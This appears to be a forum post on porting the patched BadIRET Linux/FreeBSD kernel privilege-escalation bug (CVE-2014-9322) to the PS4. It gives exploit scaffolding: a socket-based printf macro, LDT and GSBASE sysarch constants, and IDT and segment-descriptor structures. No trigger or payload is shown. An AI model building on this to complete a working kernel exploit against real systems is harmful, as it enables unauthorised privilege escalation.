
https://labs.bromium.com/2015/02/02/exploiting-badiret-vulnerability-cve-2014-9322-linux-kernel-privilege-escalation/
  • again, the shorthand prerequisites for triggering the vulnerability require you to be able to map memory, depending on your host platform and the system specifics related to satisfying these conditions.
  • in this case we are dealing with an "amd jaguar apu", so you can already kind of guess that mapping is obviously by a multiple of the page size set for your system.
  • with that said, seeing as badiret has already been patched, no one will probably care for this. but while it is good to never bite the hand that feeds you, it's also good to be able to see what is in plain sight.
Code:
#include "threadshit.h"

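/*
 * Route printf() over the debug socket instead of stdout: format the
 * message into a fixed stack buffer and push the bytes through sceNetSend().
 *
 * `sock` and sceNetSend() are expected to come from "threadshit.h";
 * snprintf() is assumed to be provided alongside sprintf() by that same
 * header — confirm. The original used sprintf(), which writes past the
 * 512-byte `buffer` for any message longer than 511 bytes; snprintf()
 * bounds the write, and the length handed to sceNetSend() is clamped to
 * the bytes actually stored, so an oversized message is truncated rather
 * than overflowing the stack. A negative return (encoding error) sends
 * nothing. Pass only literal format strings — `format` is forwarded
 * verbatim to the formatter.
 */
#define printf(format, ...)\
   do {\
     char buffer[512];\
     int size = snprintf(buffer, sizeof buffer, format, ##__VA_ARGS__);\
     if (size < 0) size = 0;\
     if (size >= (int)sizeof buffer) size = (int)sizeof buffer - 1;\
     sceNetSend(sock, buffer, size, 0);\
   } while(0)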

#define CORE 6                      /* CPU core index used by code outside this excerpt; confirm against its user */

/*
 * The constants below restate values the platform headers would normally
 * provide; presumably "threadshit.h" does not pull in the system headers.
 * The sysarch(2) / segment-descriptor values are FreeBSD's — the PS4 OS
 * is FreeBSD-derived.
 */
#define FALSE_SS_BASE  0x10000UL    /* exploit-specific base address; its use is outside this excerpt */
#define MAP_SIZE  0x10000           /* 64 KiB mapping size; a whole multiple of the page size */
#define MAP_ANON   0x0002           /* NOTE(review): on FreeBSD 0x0002 is MAP_PRIVATE and MAP_ANON is 0x1000 —
                                       confirm against the target's sys/mman.h before relying on this value */
#define I386_SET_LDT   1            /* sysarch(2) op: install LDT descriptors (FreeBSD value) */
#define   LDT_AUTO_ALLOC   0xffffffff /* I386_SET_LDT "start" value asking the kernel to pick a free LDT slot */
#define   SDT_MEMRWA   19           /* segment descriptor type: data, read/write, accessed (FreeBSD segments.h) */
#define   AMD64_GET_GSBASE 130      /* sysarch(2) op: read the user GS base (FreeBSD value) */
#define AMD64_SET_GSBASE 131        /* sysarch(2) op: write the user GS base (FreeBSD value) */

/*
 * Memory operand layout of SIDT/LIDT in long mode: a 16-bit limit followed
 * by a 64-bit linear base. Packed so that sizeof is exactly 10 bytes and
 * the struct can be read/written as the raw register image.
 */
struct idt_ptr_struct
{
   uint16_t limit;  // Size of IDT table (bytes - 1)
   uint64_t base;  // Linear base address of IDT table
} __attribute__((packed));

/*
 * One 16-byte x86-64 IDT gate descriptor, field for field. The handler
 * offset is split across three fields (low/mid/high); access_bits carries
 * the gate type, DPL and present bit; the final dword is reserved by the
 * architecture. Packed so the struct overlays a raw descriptor exactly.
 */
struct idt_entry_struct
{
   uint16_t target_offset_low;    // handler offset bits 15:0
   uint16_t target_selector;      // code segment selector loaded on entry
   uint8_t  ist_reserved_bits;    // IST index in the low 3 bits, rest reserved
   uint8_t  access_bits;          // gate type / DPL / present
   uint16_t target_offset_mid;    // handler offset bits 31:16
   uint32_t target_offset_high;   // handler offset bits 63:32
   uint32_t reserved;             // must be zero
} __attribute__((packed));

/* Short aliases for the two IDT structures above. */
typedef struct idt_entry_struct idt_entry_t;
typedef struct idt_ptr_struct idt_ptr_t;

/*
 * A 64-bit code/data segment descriptor expressed as bitfields, mirroring
 * FreeBSD's struct user_segment_descriptor (machine/segments.h). Fields are
 * listed least-significant first and sum to exactly 64 bits; the packing
 * attribute keeps the compiler from padding between them. Base and limit
 * are each split across two fields, as in the hardware format.
 */
struct   user_segment_descriptor {
   uint64_t sd_lolimit:16;   /* segment extent (lsb) */
   uint64_t sd_lobase:24;     /* segment base address (lsb) */
   uint64_t sd_type:5;     /* segment type (e.g. SDT_MEMRWA) */
   uint64_t sd_dpl:2;     /* segment descriptor priority level */
   uint64_t sd_p:1;     /* segment descriptor present */
   uint64_t sd_hilimit:4;     /* segment extent (msb) */
   uint64_t sd_xx:1;     /* unused (available to software) */
   uint64_t sd_long:1;     /* long mode (cs only) */
   uint64_t sd_def32:1;     /* default 32 vs 16 bit size */
   uint64_t sd_gran:1;     /* limit granularity (byte/page units)*/
   uint64_t sd_hibase:8;     /* segment base address  (msb) */
} __attribute__((packed));
 